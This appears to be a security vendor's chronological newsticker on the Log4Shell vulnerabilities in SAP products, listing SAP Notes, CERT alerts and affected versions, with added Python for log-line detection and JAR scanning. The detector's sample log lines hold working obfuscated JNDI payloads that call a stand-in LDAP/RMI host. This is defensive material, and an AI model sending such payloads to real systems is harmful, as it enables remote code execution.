Log4j – Newsticker


Due to the high level of uncertainty and the numerous inquiries about the security situation surrounding the Apache Log4j vulnerabilities, we have decided to summarize all relevant information, in chronological order and in the context of SAP, on this page. We will update this page regularly, so bookmark it to make sure you don't miss anything.

RECENT UPDATES

18th January 2022

[SAP Launchpad Support] Note 3142773 – Remote Code Execution vulnerability associated with Apache Log4j 2 component used in SAP Commerce. The SAP Security Note describes a workaround to mitigate the Log4Shell risk. 

https://launchpad.support.sap.com/#/notes/3142773
(login required)

18th January 2022

[SAP Launchpad Support] Note 3130920 – Remote Code Execution vulnerability associated with Apache Log4j 2 component used in SAP Data Intelligence 3 (on-premise). The SAP Security Note describes a workaround to mitigate the Log4Shell risk. 

https://launchpad.support.sap.com/#/notes/3130920
(login required)

24th December 2021

[SAP Launchpad Support] Central Security Note for Apache Log4j 2 component has been updated. The Note summarizes the Security Notes, and SAP Notes/KBA’s describing a workaround.

https://launchpad.support.sap.com/#/notes/3131047
(login required)

23rd December 2021

[SAP Launchpad Support] A priority ‘Very High’ SAP Note/KBA has just been released on component KM-WPB-MGR. Note 3132964 – [CVE-2021-44228] Remote Code Execution vulnerability associated with Apache Log4j 2 component used in SAP Enable Now Manager

https://launchpad.support.sap.com/#/notes/3132964
(login required)

22nd December 2021

[SecurityBridge Platform] Version 6.02 introduces dedicated controls to check for Log4Shell vulnerabilities. Customers can find additional information on the KB page for Compliance Check 5060, including a use case for Log4Shell [KB, login required].

22nd December 2021

[SAP Launchpad Support] A priority ‘Very High’ SAP Note/KBA has just been released on component BC-XS-ADM. Note 3132822 – [CVE-2021-45046] Remote Code Execution vulnerability associated with Apache Log4j 2 component used in XSA Cockpit

https://launchpad.support.sap.com/#/notes/3132822
(login required)

22nd December 2021

[SAP Launchpad Support] A priority ‘Very High’ SAP Note/KBA has just been released on component BC-CP-XF-KYMA. Note 3132744 – [CVE-2021-44228] Remote Code Execution vulnerability associated with Apache Log4j 2 component used in SAP BTP Kyma

https://launchpad.support.sap.com/#/notes/3132744
(login required)

21st December 2021

(UPDATED, December 21, 2021, 2.25pm EST) SAP customer message: “SAP’s Response to CVE-2021-44228 Apache Log4j 2” published on the Support Portal

https://support.sap.com/content/dam/support/en_us/library/ssp/my-support/trust-center/sap-tc-01-5025.pdf
(Login required)

21st December 2021

[SAP Launchpad Support] A priority ‘Very High’ SAP Note/KBA has just been released on component BC-NEO-SVC-IOT. Note 3132922 – [CVE-2021-44228] Remote Code Execution vulnerability associated with Apache Log4j 2 component used in Internet of Things Edge Platform

https://launchpad.support.sap.com/#/notes/3132922
(login required)

21st December 2021

[SAP Launchpad Support] A priority ‘Very High’ SAP Note/KBA has just been released on component BC-CP-CF-RT. Note 3130578 – [CVE-2021-44228] Remote Code Execution vulnerability associated with Apache Log4j 2 component used in SAP BTP Cloud Foundry

https://launchpad.support.sap.com/#/notes/3130578
(login required)

20th December 2021

[SAP Launchpad Support] A priority ‘High’ SAP Note/KBA has just been released on component IS-PMED-HPH. Note 3131824 – [CVE-2021-44228] Log4j Vulnerability in Connected Health Platform 2.0 – Fhirserver

https://launchpad.support.sap.com/#/notes/3131824
(login required)

20th December 2021

[Info] You have probably already consulted various sources of information about Log4Shell. This video explains the background and history of the Log4Shell vulnerability.

17th December 2021

[SecurityBridge Platform] A new version of the DEFAULT detection signatures was published with new settings for Listener 1082 – Suspicious web service calls [KB, login required] and Listener 1086 – Suspicious HTTP calls (available from v6.01.0) [KB, login required], which can detect Log4Shell exploitation attempts.

The latest signature can be downloaded from the SecurityBridge Support Portal: [KB, login required].
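As an added illustration of what a detection signature for Log4Shell has to handle (this is example code written for this page, not SecurityBridge's signature format or the logic of Listeners 1082/1086): the payload is rarely a plain `${jndi:ldap://...}`. Attackers URL-encode it and wrap it in nested Log4j lookups such as `${lower:j}` or `${env:NaN:-j}`, which Log4j resolves from the inside out before the JNDI lookup fires, so a detector has to normalize the same way before matching. The access-log lines below are constructed for the example; the addresses are documentation ranges.

```python
"""Normalize and flag Log4Shell-style JNDI lookups in HTTP log lines.

Added example for this page: not SecurityBridge code and not the format of
its Listener 1082/1086 signatures. The log lines below are constructed.
"""
import re
import urllib.parse

# Innermost ${...} lookup (no nested braces inside); resolved inside-out.
INNER_LOOKUP = re.compile(r"\$\{([^{}]*)\}")
# A JNDI lookup with a scheme, e.g. ${jndi:ldap://...} or ${jndi:rmi://...}
JNDI_LOOKUP = re.compile(r"\$\{\s*jndi\s*:\s*([a-z][a-z0-9+.-]*)\s*:", re.IGNORECASE)

# Constructed sample access-log lines. Hosts are documentation addresses;
# the payloads are the well-known plain, nested and URL-encoded PoC shapes.
SAMPLE_LOG_LINES = [
    '203.0.113.5 - - [16/Dec/2021:10:01:02 +0000] "GET /sap/bc/ping HTTP/1.1" 200 12 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [16/Dec/2021:10:01:03 +0000] "GET /sap/bc/ping HTTP/1.1" 200 12 "-" "${jndi:ldap://203.0.113.99:1389/a}"',
    '203.0.113.8 - - [16/Dec/2021:10:01:04 +0000] "GET /?x=${${lower:j}ndi:${lower:l}dap://203.0.113.99/b} HTTP/1.1" 400 0 "-" "curl/7.79"',
    '203.0.113.9 - - [16/Dec/2021:10:01:05 +0000] "GET /login?u=%24%7Bjndi%3Armi%3A%2F%2F203.0.113.99%3A1099%2Fc%7D HTTP/1.1" 302 0 "-" "-"',
    '203.0.113.10 - - [16/Dec/2021:10:01:06 +0000] "GET /?q=${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap://203.0.113.99/d} HTTP/1.1" 200 5 "-" "-"',
]


def _resolve_lookup(match):
    """Evaluate one innermost lookup the way attackers rely on Log4j doing it."""
    body = match.group(1)
    kind, sep, rest = body.partition(":")
    kind = kind.strip().lower()
    if kind == "jndi":
        return match.group(0)  # the lookup we are hunting for: keep it intact
    if sep and kind == "lower":
        return rest.lower()
    if sep and kind == "upper":
        return rest.upper()
    if ":-" in body:
        # ${env:NaN:-j} or ${::-j}: the lookup fails and the default "j" is substituted
        return body.split(":-", 1)[1]
    return match.group(0)  # anything else is left in place


def normalize(text, max_rounds=10):
    """Undo URL encoding and Log4j lookup obfuscation, innermost first."""
    for _ in range(max_rounds):
        decoded = urllib.parse.unquote(text)
        if decoded == text:
            break
        text = decoded
    for _ in range(max_rounds):
        resolved = INNER_LOOKUP.sub(_resolve_lookup, text)
        if resolved == text:
            break
        text = resolved
    return text


def scan_line(line):
    """Return a finding dict for a line carrying a JNDI lookup, else None."""
    norm = normalize(line)
    hit = JNDI_LOOKUP.search(norm)
    if hit:
        return {"verdict": "log4shell", "scheme": hit.group(1).lower(), "normalized": norm}
    if "${" in norm and "jndi" in norm.lower():
        # residual lookup syntax we could not fully resolve: still worth an analyst's look
        return {"verdict": "suspicious", "scheme": None, "normalized": norm}
    return None


def scan_lines(lines):
    """Scan many lines; returns [(line_number, finding), ...] for hits only."""
    findings = []
    for number, line in enumerate(lines, start=1):
        finding = scan_line(line)
        if finding:
            findings.append((number, finding))
    return findings


if __name__ == "__main__":
    for number, finding in scan_lines(SAMPLE_LOG_LINES):
        print(f"line {number}: {finding['verdict']} scheme={finding['scheme']}")
```

A signature that only matches the literal `${jndi:` catches line 2 and misses lines 3 to 5, which is why the normalization step matters more than the final regex. Matching at the HTTP layer is only a first line of defense: the lookup is evaluated wherever the string is eventually logged, so headers, form fields and JSON bodies that reach a Log4j-backed application are all candidates, and a blocked request still deserves an alert.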

17th December 2021

[SAP Launchpad Support] A priority ‘Very High’ SAP Note/KBA has just been released on component BC-SEC-ETD. Note 3131272 – CVE-2021-44228, CVE-2021-45046: Apache Log4j vulnerabilities in SAP Enterprise Threat Detection and SAP Enterprise Threat Detection Log Collector

https://launchpad.support.sap.com/#/notes/3131272
(login required)

17th December 2021

[SAP Launchpad Support] A priority ‘Very High’ SAP Note/KBA has just been released on component BC-XS-RT. Note 3130698 – Remediating log4j CVE-2021-44228 vulnerability in XS Advanced Platform and applications

https://launchpad.support.sap.com/#/notes/3130698
(login required)

16th December 2021

[SAP Launchpad Support] A priority ‘Very High’ SAP Note/KBA has just been released on component BC-XI-CON-JWS. Note 3130521 – [CVE-2021-44228] Remote Code Execution vulnerability associated with Apache Log4j 2 component used in Java Web Service Adapter of SAP NetWeaver Process Integration
https://launchpad.support.sap.com/#/notes/3130521
(login required)

16th December 2021

(UPDATED, December 16, 2021, 4.20pm EST) SAP customer message: “SAP’s Response to CVE-2021-44228 Apache Log4j 2” published on the Support Portal

https://support.sap.com/content/dam/support/en_us/library/ssp/my-support/trust-center/sap-tc-01-5025.pdf
(Login required)

16th December 2021

[Fortinet] Securing SAP Landscapes against CVE-2021-44228 (Log4j, Log4j2 or Log4Shell) (fortinet.com). SecurityBridge and FortiGate can detect and block Log4j attacks against SAP systems and display the exploitation attempt within SecurityBridge Threat Detection, where it can be correlated with internal SAP alerts and events.

16th December 2021

[SecurityBridge Platform] A new version of the Threat Detection signature template was published. The signature contains new settings for L1086 – Suspicious HTTP calls [KB]. With the new signatures it is possible to detect Log4Shell attack patterns.
Make sure to activate automatic updates as described in Signature Updates | Automatic-updates [KB].
Alternatively, upload the latest version manually into your Controller system, see Signature Updates | Latest-Version [KB].

16th December 2021

[National Cyber Security Centrum] https://github.com/NCSC-NL/log4shell Useful GitHub page from the Dutch National Cyber Security Centrum https://www.ncsc.nl/ with indicators of compromise, an overview of Log4j scanning software, and an overview of software that uses Log4j.

16th December 2021

[SAP Launchpad Support] A new priority ‘Very High’ SAP Note/KBA has just been released on component XX-INT-SR: Note 3131047, the central Security Note for the Apache Log4j 2 component. SAP recommends that you review it at your earliest convenience.
https://launchpad.support.sap.com/#/notes/3131047
(login required)

15th December 2021

[SAP Blog] Article that describes how you can check your HANA XSA systems and implement the mitigation. 
https://blogs.sap.com/2021/12/14/hana-xsa-log4j-cve-2021-44228/
(updated 2021-12-15 13:30 CET)

15th December 2021

[NIST] JMSAppender in Log4j 1.2 is vulnerable to deserialization of untrusted data when the attacker has write access to the Log4j configuration. This vulnerability is currently awaiting analysis.
https://nvd.nist.gov/vuln/detail/CVE-2021-4104

15th December 2021

(UPDATED, Version 21) CVE-2021-44228 – AS Java Core Components’ impact for Log4j vulnerability
https://launchpad.support.sap.com/#/notes/3129883
(login required)

15th December 2021

(UPDATED, Version 17) SAP Business Objects impacted for log4j vulnerability
https://launchpad.support.sap.com/#/notes/3129956
(login required)

14th December 2021

## Internal security assessment ##

All internal and customer-facing components have been scanned; no Log4j vulnerability was found.

14th December 2021

Found on lunasec.io; see the full article:
https://www.lunasec.io/docs/blog/log4j-zero-day/#affected-apache-log4j-versions

Affected Apache log4j Versions

log4j v2

Almost all versions of log4j version 2 are affected.

2.0-beta9 <= Apache log4j <= 2.14.1

LIMITED VULNERABILITY IN 2.15.0
As of Tuesday, Dec 14, version 2.15.0 was found to still have a possible vulnerability in some apps. We recommend updating to 2.16.0 which disables JNDI and completely removes %m{lookups}.
 
log4j v1
Version 1 of log4j is vulnerable to other RCE attacks, and if you’re using it you need to migrate to 2.16.0.
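To turn the version ranges above into a check you can run against a file system (for example the directories of an SAP Java instance), the following is an added example written for this page; it is not SAP's, SecurityBridge's or LunaSec's tooling. It reads the Maven `pom.properties` that log4j-core ships inside its JAR, recurses into WARs, EARs and fat JARs, reports the workaround state (whether `JndiLookup.class` has been deleted), and also lists log4j 1.x copies that still carry `JMSAppender` (CVE-2021-4104, see the 15th December entry on this page). The archives are constructed in `build_fixture()` and contain stub class files, not real Log4j code; the verdict strings are this example's own.

```python
"""Find Log4j copies (including inside WARs/EARs/fat JARs) and rate them.

Added example for this page, not SAP's or SecurityBridge's tooling. The
archives it scans are constructed in build_fixture(); real runs point
scan_tree() at a directory such as an SAP Java instance's file system.
"""
import io
import tempfile
import zipfile
from pathlib import Path

ARCHIVE_SUFFIXES = (".jar", ".war", ".ear", ".zip")
LOG4J2_POM = "META-INF/maven/org.apache.logging.log4j/log4j-core/pom.properties"
LOG4J1_POM = "META-INF/maven/log4j/log4j/pom.properties"
JNDI_LOOKUP_CLASS = "org/apache/logging/log4j/core/lookup/JndiLookup.class"
JMS_APPENDER_CLASS = "org/apache/log4j/net/JMSAppender.class"


def parse_version(version):
    """'2.0-beta9' -> (2, 0, 0, -1): any pre-release sorts below the final release."""
    core, _, qualifier = version.partition("-")
    nums = [int(p) for p in core.split(".") if p.isdigit()]
    nums += [0] * (3 - len(nums))
    return tuple(nums[:3]) + ((-1,) if qualifier else (0,))


def classify_log4j2(version, has_jndi_lookup):
    """Rate a log4j-core version against the ranges on this page."""
    if version is None:
        return "unknown version: inspect manually"
    v = parse_version(version)
    if v < parse_version("2.0-beta9"):
        return "not affected (before 2.0-beta9)"
    if v >= parse_version("2.16.0"):
        # later advisories still apply to 2.16.0; re-check the Apache security page
        return "not affected by CVE-2021-44228/45046"
    if not has_jndi_lookup:
        return "mitigated: JndiLookup.class removed"
    if v < parse_version("2.15.0"):
        return "VULNERABLE: CVE-2021-44228"
    return "VULNERABLE (limited): CVE-2021-45046"


def _read_version(zf, pom_path):
    for line in zf.read(pom_path).decode("utf-8", "replace").splitlines():
        if line.startswith("version="):
            return line.split("=", 1)[1].strip()
    return None


def inspect_archive(fileobj, label):
    """Return [(label, component, version, verdict)], recursing into nested archives."""
    findings = []
    with zipfile.ZipFile(fileobj) as zf:
        names = set(zf.namelist())
        if LOG4J2_POM in names:
            ver = _read_version(zf, LOG4J2_POM)
            findings.append((label, "log4j-core", ver, classify_log4j2(ver, JNDI_LOOKUP_CLASS in names)))
        elif JNDI_LOOKUP_CLASS in names:
            # shaded/repackaged log4j-core without Maven metadata: version unknown
            findings.append((label, "log4j-core (shaded)", None, classify_log4j2(None, True)))
        if LOG4J1_POM in names:
            ver = _read_version(zf, LOG4J1_POM)
            verdict = ("VULNERABLE: CVE-2021-4104 (JMSAppender; needs config write access), EOL"
                       if JMS_APPENDER_CLASS in names else "log4j 1.x: end of life, migrate")
            findings.append((label, "log4j-1.x", ver, verdict))
        for name in names:  # fat JARs, WEB-INF/lib, EAR-bundled modules
            if name.lower().endswith(ARCHIVE_SUFFIXES):
                try:
                    findings.extend(inspect_archive(io.BytesIO(zf.read(name)), f"{label}!/{name}"))
                except zipfile.BadZipFile:
                    continue
    return findings


def scan_tree(root):
    """Walk a directory and inspect every archive in it."""
    findings = []
    for path in sorted(Path(root).rglob("*")):
        if path.is_file() and path.suffix.lower() in ARCHIVE_SUFFIXES:
            try:
                with path.open("rb") as fh:
                    findings.extend(inspect_archive(fh, str(path)))
            except zipfile.BadZipFile:
                continue
    return findings


def build_fixture(root):
    """Constructed sample archives (class files are 4-byte stubs), not real Log4j jars."""
    root = Path(root)

    def make(name, version, classes, pom=LOG4J2_POM):
        with zipfile.ZipFile(root / name, "w") as zf:
            zf.writestr(pom, f"version={version}\n")
            for cls in classes:
                zf.writestr(cls, b"\xca\xfe\xba\xbe")

    make("log4j-core-2.14.1.jar", "2.14.1", [JNDI_LOOKUP_CLASS])
    make("log4j-core-2.14.1-patched.jar", "2.14.1", [])  # JndiLookup.class deleted
    make("log4j-core-2.15.0.jar", "2.15.0", [JNDI_LOOKUP_CLASS])
    make("log4j-core-2.16.0.jar", "2.16.0", [JNDI_LOOKUP_CLASS])
    make("log4j-1.2.17.jar", "1.2.17", [JMS_APPENDER_CLASS], pom=LOG4J1_POM)
    with zipfile.ZipFile(root / "app.war", "w") as war:  # vulnerable jar hidden in a WAR
        war.writestr("WEB-INF/lib/log4j-core-2.14.1.jar", (root / "log4j-core-2.14.1.jar").read_bytes())
    return root


def run_demo():
    """Build the fixture in a temporary directory and scan it."""
    return scan_tree(build_fixture(tempfile.mkdtemp()))


if __name__ == "__main__":
    for label, component, version, verdict in run_demo():
        print(f"{verdict:45} {component} {version} {label}")
```

Rating by version alone misses two common situations: a JAR whose `JndiLookup.class` has already been deleted (the workaround several of the SAP Notes on this page describe), which the check reports as mitigated, and shaded copies of log4j-core bundled under another artifact name without `pom.properties`, which it flags for manual inspection. Versions 2.16.0 and later are rated only against the two CVEs discussed above; consult the Apache security page linked in the 13th December entry for later advisories.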

14th December 2021

Our partner NO-MONKEY has searched for the string "Log4j" in all pages of help.sap.com and released the results in their GitHub repository:

https://github.com/NO-MONKEY/log4j_use_in_sap

14th December 2021

SAP Business Objects impacted for log4j vulnerability
https://launchpad.support.sap.com/#/notes/3129956
(login required)

14th December 2021

SAP Security Patch Day December:

None of the released security patches contain fixes for components impacted by Log4j 2.

14th December 2021

SAP customer message: “SAP’s Response to CVE-2021-44228 Apache Log4j 2” published on the Support Portal

https://support.sap.com/content/dam/support/en_us/library/ssp/my-support/trust-center/sap-tc-01-5025.pdf
(Login required)

13th December 2021

SAP HANA XS Advanced Platform potentially impacted by Log4j – CVE-2021-44228

https://launchpad.support.sap.com/#/notes/3130698
(Login required)

13th December 2021

Further information on the Apache Log4j Security Vulnerabilities

https://logging.apache.org/log4j/2.x/security.html

13th December 2021

The German Federal Office for Information Security (BSI) warns about the critical Log4j vulnerability. https://www.bsi.bund.de/SharedDocs/Cybersicherheitswarnungen/DE/2021/2021-549032-10F2.html

12th December 2021

Switzerland's GovCERT issues a warning: Zero-Day Exploit Targeting Popular Java Library Log4j
https://www.govcert.ch/blog/zero-day-exploit-targeting-popular-java-library-log4j/

10th December 2021

CERT-FR published its first alert, CERTFR-2021-ALE-022, on 10 December 2021
https://www.cert.ssi.gouv.fr/alerte/CERTFR-2021-ALE-022/

Posted by Till Pleyer